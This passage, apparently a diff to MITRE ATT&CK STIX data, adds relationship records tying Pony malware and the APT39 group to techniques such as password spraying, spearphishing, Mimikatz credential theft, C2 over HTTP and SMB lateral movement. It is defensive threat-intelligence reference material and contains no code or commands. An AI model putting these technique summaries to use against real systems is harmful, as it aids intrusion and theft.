+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--dd8d683a-0c17-448f-b604-105e130f4b04",
+ "type": "relationship",
+ "modified": "2020-06-15T16:51:22.108Z",
+ "created": "2020-05-21T21:31:34.164Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) can download additional files onto the infected system.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3ea6e72b-3d19-4864-aebd-cc31dad7d519",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.256Z",
+ "created": "2020-05-21T21:31:34.256Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a6dd4567-92ac-47e3-9688-2d555c239705",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.268Z",
+ "created": "2020-05-21T21:31:34.268Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--237cd65a-e30e-4f8a-9822-f50b818e1491",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.271Z",
+ "created": "2020-05-21T21:31:34.271Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has collected the Service Pack, language, and region information to send to the C2.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8dd83463-b0cb-46e9-a01a-b22c6780066f",
+ "type": "relationship",
+ "modified": "2020-06-15T21:31:38.116Z",
+ "created": "2020-05-21T21:31:34.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a0b2b4b4-c522-4428-a70b-ad1002417a28",
+ "type": "relationship",
+ "modified": "2020-06-15T21:31:38.112Z",
+ "created": "2020-05-21T21:31:34.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--02075984-9bec-465e-8a21-6717b9a1308b",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.290Z",
+ "created": "2020-05-21T21:31:34.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) attachments have been delivered via compressed archive files. [Pony](https://attack.mitre.org/software/S0453) also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4b2fa1ed-6c4f-4974-a44e-beeadf3a887c",
+ "type": "relationship",
+ "modified": "2020-06-15T16:51:22.160Z",
+ "created": "2020-05-21T21:31:34.298Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8f5e9158-1abe-4ed7-8a0a-df07f629aac8",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.306Z",
+ "created": "2020-05-21T21:31:34.306Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5853ff4e-9982-4d66-bf98-6c22fa42f305",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.404Z",
+ "created": "2020-05-21T21:31:34.404Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).(Citation: Malwarebytes Pony April 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--0d1cb122-5195-4d04-b5c9-85f4747886fa",
+ "type": "relationship",
+ "modified": "2020-06-15T21:31:38.170Z",
+ "created": "2020-05-21T21:31:34.415Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--cbdb211a-2772-4905-99f1-0415fb0738b3",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.422Z",
+ "created": "2020-05-21T21:31:34.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used the Smartftp Password Decryptor tool to decrypt FTP passwords.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8b2af30a-523f-41fe-88c3-ab2ee15bdec5",
+ "type": "relationship",
+ "modified": "2020-05-29T20:05:25.867Z",
+ "created": "2020-05-22T15:43:05.190Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used various tools to proxy C2 communications.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--073aff0c-1dd2-40f4-87da-d90809f3418a",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.622Z",
+ "created": "2020-05-22T15:43:05.194Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has created accounts on multiple compromised hosts to perform actions within the network.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c6f11dfe-dd59-4310-9619-ed42ee48d736",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.636Z",
+ "created": "2020-05-22T15:43:05.196Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--364be248-6fa2-42a2-847b-35e6f43fd06d",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.804Z",
+ "created": "2020-05-22T15:43:05.223Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool CrackMapExec to enumerate network shares.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--307e732c-c407-4466-951b-38062bb5e32b",
+ "type": "relationship",
+ "modified": "2020-05-29T20:22:11.379Z",
+ "created": "2020-05-22T15:43:05.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used PowerShell to execute malicious code.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0f50a4e4-6ceb-4ead-88ed-147592e0b398",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.667Z",
+ "created": "2020-05-22T15:43:05.288Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has communicated with C2 through files uploaded to DropBox.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5b875be8-3849-46e2-80cb-dec502f78f52",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.635Z",
+ "created": "2020-05-22T18:00:52.255Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used remote access tools that leverage DNS in communications with C2.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9a66e38c-ea79-4b7b-bf74-555da87d58c3",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.671Z",
+ "created": "2020-05-22T18:00:52.264Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c906ddd0-e3fb-42ad-84cb-84ca093ddbb2",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.684Z",
+ "created": "2020-05-22T18:00:52.267Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d9dce15d-68d8-46af-a7ec-354bf5093c49",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.678Z",
+ "created": "2020-05-22T18:00:52.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used different versions of Mimikatz to obtain credentials.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0f93a49a-11c8-49d8-9b58-e7136e6bc850",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.640Z",
+ "created": "2020-05-22T18:06:30.013Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used SMB for lateral movement.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--fa82d7c2-bdc5-4945-9d59-5b40eb9a7454",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.921Z",
+ "created": "2020-05-22T19:37:14.203Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has downloaded tools to compromised hosts.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--60f1cf34-8c60-47b7-ba9a-88c2575006f9",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.209Z",
+ "created": "2020-05-22T19:37:14.209Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used tools capable of stealing contents of the clipboard.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0f81e969-dfc4-4d37-8664-59c31bd7116c",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.265Z",
+ "created": "2020-05-22T19:37:14.265Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a tool to steal files from the compromised host.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0e4c55fc-a923-4c05-89ce-3102620a41d7",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.268Z",
+ "created": "2020-05-22T19:37:14.268Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
